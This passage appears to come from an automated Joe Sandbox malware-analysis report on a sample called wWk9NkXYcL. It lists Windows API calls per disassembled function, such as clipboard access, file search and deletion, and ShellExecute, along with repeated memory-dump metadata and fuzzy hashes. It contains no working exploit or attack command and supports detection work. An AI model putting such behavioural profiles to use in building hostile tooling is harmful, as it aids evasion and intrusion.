                    • GetDlgItem.USER32(?,000003EE), ref: 00404C25
                    • GetClientRect.USER32(?,?), ref: 00404C62
                    • GetSystemMetrics.USER32(00000015), ref: 00404C6A
                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
                    • ShowWindow.USER32(?,00000008), ref: 00404D06
                    • GetDlgItem.USER32(?,000003EC), ref: 00404D27
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
                    • GetDlgItem.USER32(?,000003F8), ref: 00404C34
                      • Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E
                    • GetDlgItem.USER32(?,000003EC), ref: 00404D77
                    • CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
                    • CloseHandle.KERNEL32(00000000), ref: 00404D8C
                    • ShowWindow.USER32(00000000), ref: 00404DB3
                    • ShowWindow.USER32(?,00000008), ref: 00404DB8
                    • ShowWindow.USER32(00000008), ref: 00404DFF
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
                    • CreatePopupMenu.USER32 ref: 00404E42
                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
                    • GetWindowRect.USER32(?,?), ref: 00404E6A
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
                    • OpenClipboard.USER32(00000000), ref: 00404ED7
                    • EmptyClipboard.USER32 ref: 00404EDD
                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
                    • GlobalLock.KERNEL32(00000000), ref: 00404EF3
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
                    • GlobalUnlock.KERNEL32(00000000), ref: 00404F29
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
                    • CloseClipboard.USER32 ref: 00404F3A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                    • Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
                    • Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                    • Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58
                    APIs
                    • GetDlgItem.USER32(?,000003FB), ref: 0040405A
                    • SetWindowTextW.USER32(?,?), ref: 00404087
                    • SHBrowseForFolderW.SHELL32(?), ref: 0040413F
                    • CoTaskMemFree.OLE32(00000000), ref: 0040414A
                    • lstrcmpiW.KERNEL32(LimePhillips,0044FD98,00000000,?,?), ref: 0040417C
                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
                    • lstrcatW.KERNEL32(?,LimePhillips), ref: 00404188
                      • Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                      • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    • GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
                    • SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$LimePhillips
                    • API String ID: 2246997448-475300666
                    • Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                    • Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
                    • Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                    • Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59
                    APIs
                    • DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
                    • lstrcatW.KERNEL32(00465470,\*.*,00465470,?,004CC0A0,00000002,?,004E00C8), ref: 004065C8
                    • lstrcatW.KERNEL32(?,004082C8,?,00465470,?,004CC0A0,00000002,?,004E00C8), ref: 004065E8
                    • lstrlenW.KERNEL32(?), ref: 004065EB
                    • FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
                    • FindClose.KERNEL32(00000000), ref: 004066C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: \*.*$pTF
                    • API String ID: 2035342205-2155356189
                    • Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                    • Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
                    • Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                    • Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D
                    APIs
                    • CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                    • Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
                    • Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                    • Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                    • Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
                    • Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                    • Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                    • Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
                    • Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                    • Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                    • Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
                    • Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                    • Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84
                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
                    • ShowWindow.USER32(?), ref: 00404F9E
                    • DestroyWindow.USER32 ref: 00404FB2
                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
                    • GetDlgItem.USER32(?,?), ref: 00404FEF
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
                    • IsWindowEnabled.USER32(00000000), ref: 0040500A
                    • GetDlgItem.USER32(?,00000001), ref: 004050B9
                    • GetDlgItem.USER32(?,00000002), ref: 004050C3
                    • SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
                    • GetDlgItem.USER32(?,00000003), ref: 004051D4
                    • ShowWindow.USER32(00000000,?), ref: 004051F6
                    • EnableWindow.USER32(?,?), ref: 00405208
                    • EnableWindow.USER32(?,?), ref: 00405223
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
                    • EnableMenuItem.USER32(00000000), ref: 00405240
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
                    • lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
                    • SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
                    • ShowWindow.USER32(?,0000000A), ref: 004053DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                    • String ID:
                    • API String ID: 184305955-0
                    • Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                    • Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
                    • Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                    • Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E
                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
                    • GetDlgItem.USER32(?,000003E8), ref: 00403CE7
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
                    • GetSysColor.USER32(?), ref: 00403D15
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
                    • lstrlenW.KERNEL32(?), ref: 00403D3C
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58
                      • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
                      • Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
                      • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B
                    • GetDlgItem.USER32(?,0000040A), ref: 00403DB2
                    • SendMessageW.USER32(00000000), ref: 00403DB9
                    • GetDlgItem.USER32(?,000003E8), ref: 00403DE4
                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
                    • SetCursor.USER32(00000000), ref: 00403E38
                    • ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
                    • SetCursor.USER32(00000000), ref: 00403E5C
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                    • String ID: LimePhillips$N$open
                    • API String ID: 3928313111-3321108494
                    • Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                    • Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
                    • Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                    • Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99
                    APIs
                    • lstrcpyW.KERNEL32(00463E20,NUL,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000,000000F1,?), ref: 0040636B
                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
                    • GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393
                      • Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                      • Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                    • GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
                    • wsprintfA.USER32 ref: 0040640F
                    • GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5
                      • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                      • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
                    • GlobalFree.KERNEL32(00000000), ref: 00406510
                    • CloseHandle.KERNEL32(?), ref: 0040651A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                    • String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
                    • API String ID: 565278875-2487742289
                    • Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                    • Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
                    • Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                    • Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE
                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32(?,?), ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                    • DeleteObject.GDI32(?), ref: 004010F6
                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                    • SelectObject.GDI32(00000000,?), ref: 00401149
                    • DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                    • DeleteObject.GDI32(?), ref: 0040116E
                    • EndPaint.USER32(?,?), ref: 00401177
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
